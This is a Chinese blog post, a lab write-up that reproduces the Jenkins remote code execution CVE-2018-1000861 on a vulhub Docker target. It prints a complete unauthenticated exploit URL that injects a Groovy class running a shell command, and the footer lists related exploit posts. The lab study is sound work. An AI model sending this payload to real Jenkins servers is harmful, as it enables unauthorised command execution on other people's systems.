Jenkins远程命令执行漏洞(CVE-2018-1000861)

已于 2024-07-12 14:26:14 修改
阅读量321 收藏 10
点赞数 5
文章标签: jenkins 安全 网络安全 java
于 2024-07-10 19:53:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62056583/article/details/140332666
版权

Jenkins远程命令执行漏洞(CVE-2018-1000861)

Jenkins远程命令执行漏洞(CVE-2018-1000861)

1.实验目的

复现并分析【CVE-2018-1000861】Jenkins 远程代码执行漏洞
使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。

2.覆盖知识点

Jenkins
Jenkins可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。通过更新中心中的1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限
Docker
Docker 技术使用 Linux 内核和内核功能(例如 Cgroups 和 namespaces)来分隔进程,以便各进程相互独立运行。这种独立性正是采用容器的目的所在;它可以独立运行多种进程、多个应用,更加充分地发挥基础设施的作用,同时保持各个独立系统的安全性。

3.实验环境与操作

实验环境
1、VMware Workstation 16
2、Ubuntu 20.4 操作系统(靶场安装环境)
IP地址:192.168.32.135
3、kali Linux
IP地址:192.168.32.128
4、vulhub靶场
实验步骤
打开Ubuntu靶机进入镜像目录

cd /vulhub/jenkins/CVE-2018-100861

启动docker

docker-compose up -d

在这里插入图片描述
启动成功后在kali中打开http://192.168.32.135:8080/

http://your IP:8080/

打开后可以看到一个由Jenkins框架搭建的页面。
漏洞复现
使用如下指令直接开始攻击,访问URL即可完成攻击

http://192.168.32.135:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true
&value=public class x {
  public x(){
    "touch /tmp/success".execute()
  }
}

在这里插入图片描述随后我们在Ubuntu中查看是否实现攻击
使用docker exec -it ID bin/bash进入目录中进行查看,可以看到成功注入,漏洞复现成功
在这里插入图片描述

霞日
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码,即所谓的预认证远程代码执行(PreAuth RCE)。这个漏洞的影响非常严重,因为它无需任何登录凭据即可利用。 漏洞复现...
GitHack-master.rar
01-06
5. **Git漏洞利用与防护**:可能包含了关于已知Git漏洞的信息,例如CVE-2021-21300,这是一个允许攻击者通过恶意的Git钩子脚本执行任意代码的漏洞。了解这些漏洞可以帮助我们增强仓库的安全性。 6. **Git forensics...
Jenkins未授权访问漏洞&命令执行
qq_45434762的博客
03-28 9178
Jenkins未授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1540
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 556
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
最新发布
04-12 529
【代码】漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
pwn_jenkins:有关攻击Jenkins服务器的注意事项
05-12
身份验证/ ACL绕过(CVE-2018-1000861Jenkins <2.150.1) 详细信息。 如果Jenkins请求身份验证,但使用以下请求返回有效数据,则该漏洞很容易受到攻击: curl -k -4 -s ...
信息安全_数据安全_Hacking Jenkins !.pdf
08-22
- 已知漏洞Jenkins历史上曾发生过多次序列化漏洞,例如CVE-2015-8103、CVE-2016-0788等,这些漏洞可能导致远程代码执行(RCE)。 5. Jenkins历史上的序列化漏洞 - CVE-2015-8103:这是Jenkins中的第一个序列化...
2022年HW前沿漏洞利用库.pdf
06-30
其中,Windows系统漏洞包括CVE-2022-26809、CVE-2022-29141、CVE-2022-23257、CVE-2022-24537、CVE-2022-22008和CVE-2022-21907等多个漏洞。这些漏洞可能会导致远程代码执行、提权和虚拟化逃逸等问题。 服务漏洞...
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
概念验证 描述 特定于Apache Web服务器(httpd)的代码在将请求的路径与Apache Tomcat JK(mod_jk)连接器1.2.0至1.2.44中的URI-worker映射进行匹配之前对其进行了规范化,无法正确处理某些边缘情况。如果仅通过httpd公开了Tomcat支持的URL的子集,则特殊构造的请求可能会通过反向代理公开应用程序功能,而该功能不适用于客户端通过反向代理访问应用程序。在某些配置中,特殊构造的请求也有可能绕过httpd中配置的访问控制。尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 运行后,可通过以下地址访问易受攻击的代理 开发 可以将使用mod
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
CVE-2019-0708漏洞利用脚本
01-10
自己下载到kali解压,参考文章https://blog.csdn.net/weixin_43742395/article/details/112432343
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4479
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
jenkins rec 分析 cve-2018-1000861 分析
whatday的专栏
06-02 1044
0x01 Jenkins的动态路由解析 web.xml: 可以看到Jenkins将所有的请求交给org.kohsuke.stapler.Stapler来处理的,跟进看一下这个类中的service方法: 可以看到这里会根据url来调用不同的webApp,如果url以/$stapler/bound/开头,则根节点对象为org.kohsuke.stapler.bind.BoundObjectTable,否则为hudson.model.Hudson(继承jenkins.model.Jenkins
jekins CVE-2018-1000861 漏洞复现
XXokok的博客
11-28 406
描述: Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值